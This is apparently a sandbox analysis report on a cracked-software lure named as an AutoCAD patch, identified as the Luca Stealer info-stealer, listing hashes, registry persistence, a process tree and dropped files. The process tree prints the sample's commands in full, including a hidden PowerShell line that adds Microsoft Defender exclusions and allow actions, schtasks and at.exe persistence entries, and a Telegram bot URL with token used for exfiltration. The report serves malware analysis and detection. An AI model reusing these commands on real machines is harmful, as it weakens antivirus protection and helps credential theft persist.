lucastealer | ff39886baad3900fbd5edceefd6058fe87435950ac6c46d5a222b90264b2f303

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
05-05-2023 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AutoCAD_Patch_Languague_2022_x64.exe
Size

4.5MB
MD5

c2b4425b66906d54cb7c9740bc6d4ba0
SHA1

8e647dc068f7579b8fe5a24db25f1ecfeac4ace6
SHA256

ff39886baad3900fbd5edceefd6058fe87435950ac6c46d5a222b90264b2f303
SHA512

86e33e0224d021207a139263de5527788fce0f686cb581b1a54735378453c68d9ad525f271b995f28c91e881d329ab729920403d8c674410833ce0fd34f9f74f
SSDEEP

98304:mtrbTA1TXSLLIBw+a5XLW6jRhdGVQguhhW31Z6:Yc1TiLLSwLL5LdGVzu+lc

Score

10^/10

lucastealer evasion persistence stealer

Malware Config

Extracted

Family

lucastealer

https://api.telegram.org/bot6068798932:AAG_cHiqinDwNZ3Hd-rdp8tPwbT0czdVwTw

Signatures

Luca Stealer
Info stealer written in Rust first seen in July 2022.
stealer lucastealer

Luca Stealer payload 11 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
C:\Users\Admin\AppData\Local\Temp\TZELRK.exe	family_lucastealer
\??\c:\users\admin\appdata\local\temp\tzelrk.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\tzelrk.exe	family_lucastealer
\Users\Admin\AppData\Local\Temp\tzelrk.exe	family_lucastealer
C:\Users\Admin\AppData\Local\Temp\tzelrk.exe	family_lucastealer

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	svchost.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Processes:

explorer.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Modifies Installed Components in the registry 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

svchost.exeexplorer.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe

Drops startup file 1 IoCs

Processes:

AutoCAD_Patch_Languague_2022_x64.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OXRXOQ.lnk	AutoCAD_Patch_Languague_2022_x64.exe

Executes dropped EXE 7 IoCs

Processes:

TZELRK.exetzelrk.exe icsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid process

2016 TZELRK.exe
1660 tzelrk.exe
1936 icsys.icn.exe
1708 explorer.exe
276 spoolsv.exe
1692 svchost.exe
1816 spoolsv.exe

Loads dropped DLL 17 IoCs

Processes:

AutoCAD_Patch_Languague_2022_x64.exeTZELRK.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe

pid	process
1340	AutoCAD_Patch_Languague_2022_x64.exe
1340	AutoCAD_Patch_Languague_2022_x64.exe
1340	AutoCAD_Patch_Languague_2022_x64.exe
1340	AutoCAD_Patch_Languague_2022_x64.exe
1340	AutoCAD_Patch_Languague_2022_x64.exe
2016	TZELRK.exe
2016	TZELRK.exe
2016	TZELRK.exe
2016	TZELRK.exe
1936	icsys.icn.exe
1936	icsys.icn.exe
1708	explorer.exe
1708	explorer.exe
276	spoolsv.exe
276	spoolsv.exe
1692	svchost.exe
1692	svchost.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

svchost.exeAutoCAD_Patch_Languague_2022_x64.exeexplorer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Run	AutoCAD_Patch_Languague_2022_x64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Windows\CurrentVersion\Run\OXRXOQ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\Microsoft Office Click-to-Run.exe\""	AutoCAD_Patch_Languague_2022_x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Windows directory 6 IoCs

Processes:

svchost.exeexplorer.exeicsys.icn.exespoolsv.exe

description	ioc	process
File opened for modification	\??\c:\windows\system\svchost.exe	svchost.exe
File opened for modification	C:\Windows\system\udsys.exe	explorer.exe
File opened for modification	\??\c:\windows\system\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\system\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	spoolsv.exe
File opened for modification	\??\c:\windows\system\explorer.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1428 schtasks.exe

pid	process
1428	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

AutoCAD_Patch_Languague_2022_x64.exeicsys.icn.exepowershell.exeexplorer.exesvchost.exe

pid	process
1340	AutoCAD_Patch_Languague_2022_x64.exe
1936	icsys.icn.exe
1612	powershell.exe
1708	explorer.exe
1708	explorer.exe
1708	explorer.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe
1708	explorer.exe
1708	explorer.exe
1692	svchost.exe
1692	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exesvchost.exe

pid process

1708 explorer.exe
1692 svchost.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1612 powershell.exe

pid	process
1708	explorer.exe
1692	svchost.exe

description	pid	process
Token: SeDebugPrivilege	1612	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

TZELRK.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exespoolsv.exe

pid	process
2016	TZELRK.exe
2016	TZELRK.exe
1936	icsys.icn.exe
1936	icsys.icn.exe
1708	explorer.exe
1708	explorer.exe
276	spoolsv.exe
276	spoolsv.exe
1692	svchost.exe
1692	svchost.exe
1816	spoolsv.exe
1816	spoolsv.exe
1708	explorer.exe
1708	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AutoCAD_Patch_Languague_2022_x64.execmd.exeTZELRK.execmd.exeicsys.icn.exeexplorer.exespoolsv.exesvchost.exe

description	pid	process	target process
PID 1340 wrote to memory of 2016	1340	AutoCAD_Patch_Languague_2022_x64.exe	TZELRK.exe
PID 1340 wrote to memory of 2016	1340	AutoCAD_Patch_Languague_2022_x64.exe	TZELRK.exe
PID 1340 wrote to memory of 2016	1340	AutoCAD_Patch_Languague_2022_x64.exe	TZELRK.exe
PID 1340 wrote to memory of 2016	1340	AutoCAD_Patch_Languague_2022_x64.exe	TZELRK.exe
PID 1340 wrote to memory of 1508	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1340 wrote to memory of 1508	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1340 wrote to memory of 1508	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1340 wrote to memory of 1508	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1508 wrote to memory of 904	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 904	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 904	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 904	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1612	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 1612	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 1612	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 1612	1508	cmd.exe	powershell.exe
PID 2016 wrote to memory of 1660	2016	TZELRK.exe	tzelrk.exe
PID 2016 wrote to memory of 1660	2016	TZELRK.exe	tzelrk.exe
PID 2016 wrote to memory of 1660	2016	TZELRK.exe	tzelrk.exe
PID 2016 wrote to memory of 1660	2016	TZELRK.exe	tzelrk.exe
PID 1508 wrote to memory of 1700	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1700	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1700	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1700	1508	cmd.exe	reg.exe
PID 1340 wrote to memory of 1808	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1340 wrote to memory of 1808	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1340 wrote to memory of 1808	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1340 wrote to memory of 1808	1340	AutoCAD_Patch_Languague_2022_x64.exe	cmd.exe
PID 1808 wrote to memory of 1428	1808	cmd.exe	schtasks.exe
PID 1808 wrote to memory of 1428	1808	cmd.exe	schtasks.exe
PID 1808 wrote to memory of 1428	1808	cmd.exe	schtasks.exe
PID 1808 wrote to memory of 1428	1808	cmd.exe	schtasks.exe
PID 2016 wrote to memory of 1936	2016	TZELRK.exe	icsys.icn.exe
PID 2016 wrote to memory of 1936	2016	TZELRK.exe	icsys.icn.exe
PID 2016 wrote to memory of 1936	2016	TZELRK.exe	icsys.icn.exe
PID 2016 wrote to memory of 1936	2016	TZELRK.exe	icsys.icn.exe
PID 1936 wrote to memory of 1708	1936	icsys.icn.exe	explorer.exe
PID 1936 wrote to memory of 1708	1936	icsys.icn.exe	explorer.exe
PID 1936 wrote to memory of 1708	1936	icsys.icn.exe	explorer.exe
PID 1936 wrote to memory of 1708	1936	icsys.icn.exe	explorer.exe
PID 1708 wrote to memory of 276	1708	explorer.exe	spoolsv.exe
PID 1708 wrote to memory of 276	1708	explorer.exe	spoolsv.exe
PID 1708 wrote to memory of 276	1708	explorer.exe	spoolsv.exe
PID 1708 wrote to memory of 276	1708	explorer.exe	spoolsv.exe
PID 276 wrote to memory of 1692	276	spoolsv.exe	svchost.exe
PID 276 wrote to memory of 1692	276	spoolsv.exe	svchost.exe
PID 276 wrote to memory of 1692	276	spoolsv.exe	svchost.exe
PID 276 wrote to memory of 1692	276	spoolsv.exe	svchost.exe
PID 1692 wrote to memory of 1816	1692	svchost.exe	spoolsv.exe
PID 1692 wrote to memory of 1816	1692	svchost.exe	spoolsv.exe
PID 1692 wrote to memory of 1816	1692	svchost.exe	spoolsv.exe
PID 1692 wrote to memory of 1816	1692	svchost.exe	spoolsv.exe
PID 1692 wrote to memory of 1676	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1676	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1676	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1676	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 992	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 992	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 992	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 992	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1192	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1192	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1192	1692	svchost.exe	at.exe
PID 1692 wrote to memory of 1192	1692	svchost.exe	at.exe

C:\Users\Admin\AppData\Local\Temp\AutoCAD_Patch_Languague_2022_x64.exe
"C:\Users\Admin\AppData\Local\Temp\AutoCAD_Patch_Languague_2022_x64.exe"
1⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1340
- C:\Users\Admin\AppData\Local\Temp\TZELRK.exe
  "C:\Users\Admin\AppData\Local\Temp\TZELRK.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2016
- - \??\c:\users\admin\appdata\local\temp\tzelrk.exe
    c:\users\admin\appdata\local\temp\tzelrk.exe
    3⤵
    - Executes dropped EXE
    PID:1660
- - C:\Users\Admin\AppData\Local\icsys.icn.exe
    C:\Users\Admin\AppData\Local\icsys.icn.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - \??\c:\windows\system\explorer.exe
      c:\windows\system\explorer.exe
      4⤵
      Modifies WinLogon for persistence
      Modifies visiblity of hidden/system files in Explorer
      Modifies Installed Components in the registry
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1708
    - - \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe SE
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:276
      - \??\c:\windows\system\svchost.exe
        
        c:\windows\system\svchost.exe
        6⤵
        Modifies WinLogon for persistence
        Modifies visiblity of hidden/system files in Explorer
        Modifies Installed Components in the registry
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1692
        
        \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe PR
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1816
        
        C:\Windows\SysWOW64\at.exe
        
        at 16:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        7⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\at.exe
        
        at 16:08 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        7⤵
        
        PID:992
        
        C:\Windows\SysWOW64\at.exe
        
        at 16:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        7⤵
        
        PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\UGGRUW.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\SysWOW64\reg.exe
    reg query "HKU\S-1-5-19\Environment"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -nologo -noninteractive -windowStyle hidden -noprofile -command $First = "Add-MpPreference -ThreatIDDefaultAction_Ids "; $Third = " -ThreatIDDefaultAction_Actions Allow -Force"; $ListID = 2147685180, 2147735507, 2147736914, 2147743522, 2147734094, 2147743421, 251873, 213927, 2147722906, 2147748160; ForEach ($ID in $ListID) { Invoke-Expression ($First + $ID + $Third) }; $ListPath = "C:\Windows\KMSAutoS", "C:\Windows\System32\SppExtComObjHook.dll", "C:\Windows\System32\SppExtComObjPatcher.exe", "C:\Windows\AAct_Tools", "C:\Windows\AAct_Tools\AAct_x64.exe", "C:\Windows\AAct_Tools\AAct_files\KMSSS.exe", "C:\Windows\AAct_Tools\AAct_files", "C:\Windows\KMS"; $First = "Add-MpPreference -ExclusionPath "; $Third = "-Force"; ForEach ($Path in $ListPath) { Invoke-Expression ($First + $Path + $Third) }; :Admin
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- - C:\Windows\SysWOW64\reg.exe
    reg query "HKU\S-1-5-19\Environment"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn OXRXOQ.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn OXRXOQ.exe /tr C:\Users\Admin\AppData\Roaming\Windata\Microsoft Office Click-to-Run.exe /sc minute /mo 1
    3⤵
    - Creates scheduled task(s)
    PID:1428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\UGGRUW.cmd

Filesize
1KB

MD5
15a1fe3d0f342bdd3232253c7810a05d

SHA1
b658e0d903b37bf12e8e640bece22f235552dc50

SHA256
4070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338

SHA512
1961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\UGGRUW.cmd

Filesize
1KB

MD5
15a1fe3d0f342bdd3232253c7810a05d

SHA1
b658e0d903b37bf12e8e640bece22f235552dc50

SHA256
4070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338

SHA512
1961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\tzelrk.exe

Filesize
5.7MB

MD5
2c2055233260e5bb20ce675afd39ed0d

SHA1
26c056ba8e99a3fb523612b422a85be3ecbbd5b3

SHA256
306827f0ef0a4cbecd5458776244bf7ee99f2e49569daf0034176b39f5d1c17d

SHA512
3e2a18cd0c7fe5e3529d37ac37b352f8c19d3fef947f117701bb712c19cb40ff3ed56c843c789334a6c93382deef1f5cf4a48fbadb6b1e46fe804b9430fa1546

Download Submit
C:\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
C:\Users\Admin\AppData\Roaming\mrsys.exe

Filesize
206KB

MD5
e48569ac685f518878f8371ee83127d6

SHA1
7b9a68007642a328d2447ffed9a4487b85006bc9

SHA256
189dcca284c890ecc1987ce663d90eed12f67521e33b9c00e0896bf029d57a7b

SHA512
97d396eafd00d0dd6ed92bed20493c4ccc881f4ed4bd5a6db04838b3247b78101ca7e45cc050915abe0d9eb53cb142ba5406de1c9e30b5eb0db170fb86398294

Download Submit
C:\Windows\system\explorer.exe

Filesize
206KB

MD5
5f4ff718615c3a84eacd35082e7821c0

SHA1
6e273f1501c30190eaf472a3bd6a3f3264c90484

SHA256
eecada653f928f742e7e1bbdfe5f3dae2cddd8cc3cc288018a98d0fca83cc56b

SHA512
6d45ff52333b79070bc069627a3dfa69f17d356b25cc6c4c43ad307d969d80b0e9becfba3389c010f3b46e5dbd6dffa10820be132fa2620c8e136c017849691d

Download Submit
C:\Windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
C:\Windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
C:\Windows\system\svchost.exe

Filesize
206KB

MD5
17d20e1197d46585085b1921608b0572

SHA1
ac6a10a719b084a33b56f228dcaba614f7ba5199

SHA256
c52aab64934f51001d6bb099174dd5cafe63d39841b8706c7766d4abf50fe8bc

SHA512
9f0c040c254328342198aaf6ac42e944bb6b9cba3127ad6008b70de84c47165af31c3ab7850613ab29558a9f4351ea86813933c2bb284e0fc95b82361d61cdba

Download Submit
\??\c:\users\admin\appdata\local\icsys.icn.exe

Filesize
206KB

MD5
c5f78d788265a8c2b80017a0dc351266

SHA1
32836c3ccaf84431beaba1b10107743c052cddc0

SHA256
0a48908b44578715b511d6c067b2b0c1351783c049c68183f6067afff1ff72d0

SHA512
0315d122adf425001109bae742a1aff418f301f46c3655bf3e3d0c12ecc03ac3d70b52a60a744f81b7b041d28bf235f3d93abc26c71bfdd388be6a145a1bbb16

Download Submit
\??\c:\users\admin\appdata\local\temp\tzelrk.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
\??\c:\windows\system\explorer.exe

Filesize
206KB

MD5
5f4ff718615c3a84eacd35082e7821c0

SHA1
6e273f1501c30190eaf472a3bd6a3f3264c90484

SHA256
eecada653f928f742e7e1bbdfe5f3dae2cddd8cc3cc288018a98d0fca83cc56b

SHA512
6d45ff52333b79070bc069627a3dfa69f17d356b25cc6c4c43ad307d969d80b0e9becfba3389c010f3b46e5dbd6dffa10820be132fa2620c8e136c017849691d

Download Submit
\??\c:\windows\system\spoolsv.exe

Filesize
206KB

MD5
530596aad42997ed04b8a28c7ae5c122

SHA1
bf66d1526e3189093dcd5d9b2eeb068ad91dbcff

SHA256
661ccc60aeae50c7cbc28e54f69aad1af84b88b455be30d2aab27fc9fa1cb031

SHA512
40c2c1d1038e053773bc0c8df1465ad866646f71c16b510a72f2864bddff6f2ccdd3c6c2e157165ff93b0e29424c6207fba7e002c19fd0c8a66913434335be4a

Download Submit
\??\c:\windows\system\svchost.exe

Filesize
206KB

MD5
17d20e1197d46585085b1921608b0572

SHA1
ac6a10a719b084a33b56f228dcaba614f7ba5199

SHA256
c52aab64934f51001d6bb099174dd5cafe63d39841b8706c7766d4abf50fe8bc

SHA512
9f0c040c254328342198aaf6ac42e944bb6b9cba3127ad6008b70de84c47165af31c3ab7850613ab29558a9f4351ea86813933c2bb284e0fc95b82361d61cdba

Download Submit
\Users\Admin\AppData\Local\Temp\TZELRK.exe

Filesize
5.9MB

MD5
021079dc0918b9c7359e93e770678000

SHA1
70c03da6f7b339340b1943f5d0b7b1fd87579adf

SHA256
ee63e26e84d8092fda9e527f7db34777b6261d8dfc96ed42167383f88cf1c487

SHA512
9bc14753e39f2c93737886439d64a458f08265d1d8176c233a8e3f864e1f4f2751b161aa22408618d0dd343fb88b7037c8c2eee898c6d9b3bf466aaea709c5b0

Download Submit
